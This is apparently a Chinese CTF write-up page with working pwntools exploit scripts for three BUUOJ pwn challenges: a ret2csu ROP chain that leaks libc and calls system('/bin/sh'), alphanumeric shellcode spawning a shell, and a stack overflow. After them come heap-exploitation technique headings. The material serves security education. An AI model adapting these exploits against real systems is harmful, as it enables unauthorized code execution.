本题使用到了ret2csu的方法，因为一开始不知道libc基址，于是首先通过调用puts函数的plt表获取libc基地址，然后在后面调用一个read函数，继续补全下面的ROP链（补充system函数调用的部分）。

from pwn import *
from LibcSearcher import *
context.log_level = 'debug'

# io = process('./ACTF_2019_babystack')
io = remote('node4.buuoj.cn', 26302)
elf = ELF('./ACTF_2019_babystack')

io.sendlineafter(b'>', b'224')
io.recvuntil(b'Your message will be saved at ')
stack_addr = int((io.recvuntil(b'\n', drop=True).decode())[2:], 16)
print(hex(stack_addr))

poprdi_ret = 0x400ad3
main = 0x4008F6

payload = p64(poprdi_ret)
payload += p64(elf.got['puts'])
payload += p64(elf.plt['puts'])
payload += p64(0x400ACA)
payload += p64(0)		# rbx
payload += p64(1)		# rbp
payload += p64(elf.got['read'])	# r12
payload += p64(0x30)		# r13
payload += p64(stack_addr + 18 * 8)	# r14
payload += p64(0)		# r15
payload += p64(0x400AB0)
payload += p64(0) * 6
payload = payload.ljust(0xD0, b'\x00') + p64(stack_addr - 0x8) + p64(0x400A18)

io.sendafter(b'>', payload)

io.recvuntil(b'Byebye~\n')
puts = u64(io.recvuntil(b'\n', drop=True) + b'\x00\x00')
print(hex(puts))

libc = LibcSearcher('puts', puts)
base = puts - libc.dump('puts')
print(hex(base))
system = base + libc.dump('system')
binsh = base + libc.dump('str_bin_sh')

payload = p64(poprdi_ret)
payload += p64(binsh)
payload += p64(system)
io.send(payload)

io.interactive()

buu081-mrctf2020_shellcode_revenge

单纯的一个只允许使用字母和数字的shellcode，使用ae64可直接获取。

from pwn import *
from ae64 import *
context.log_level = 'debug'
context.arch = 'amd64'

# io = process(['./mrctf2020_shellcode_revenge'])
io = remote('node4.buuoj.cn', 25890)

sa = lambda x, y: io.sendafter(x, y)
shellcode = AE64().encode(asm(shellcraft.amd64.sh()), 'rax')

if __name__ == '__main__':
    sa(b'Show me your magic!\n', shellcode)
    io.interactive()

buu082-suctf_2018_basic pwn

最简单的栈溢出。

from pwn import *
context.log_level = 'debug'

# io = process('./SUCTF_2018_basic_pwn')
io = remote('node4.buuoj.cn', 29234)
elf = ELF('./SUCTF_2018_basic_pwn')

io.sendline(cyclic(0x110 + 8) + p64(0x401157))

io.interactive()

17. unsafe_unlink

为什么要设置fd=y-0x18，bk=y-0x10？

18. unsorted_bin_attack

19. unsorted_bin_into_stack

12. large_bin_attack

13. mmap_overlapping_chunks

14. overlapping_chunks

15. overlapping_chunks_2

16. poison_null_byte

9. house_of_roman

Step 1: 控制__malloc_hook

Step 2: Unsorted bin attack

Step 3: getshell

10. house_of_spirit

重要：_int_free函数的fastbin检查：

11. house_of_storm

本漏洞利用中_int_malloc函数中重要步骤：

7. house_of_mind_fastbin

8. House_of_orange

1. fastbin_dup

2. fastbin_dup_consolidate

3. fastbin_dup_into_stack

4. house_of_einherjar

重要：_int_free中的检查项目（部分）

5. house_of_force

6. house_of_lore

A. 逆向分析

A.1 add message

A.2 view message

A.3 edit message

A.4 delete message

A.5 change role

B. 漏洞分析

C. 漏洞利用

C.1 准备tcache stashing unlink attack的堆环境

C.2 获取libc地址和堆地址

C.3 第一次large bin attack

C.4 第二次large bin attack

C.5 tcache stashing unlink attack以及构造_IO_FILE

D. glibc 2.31版本house of pig演示程序

buu073-hitcontraining_bamboobox

buu074-cmcc_pwnme2

buu075-picoctf_2018_got-shell

buu076-npuctf_2020_easyheap

buu077-wdb_2018_2nd_easyfmt

buu078-PicoCTF_2018_can-you-gets-me

buu079-mrctf2020_easy_equation

buu080-ACTF_2019_babystack

buu081-mrctf2020_shellcode_revenge

buu082-suctf_2018_basic pwn

C.5 tcache stashing unlink attack以及构造`_IO_FILE`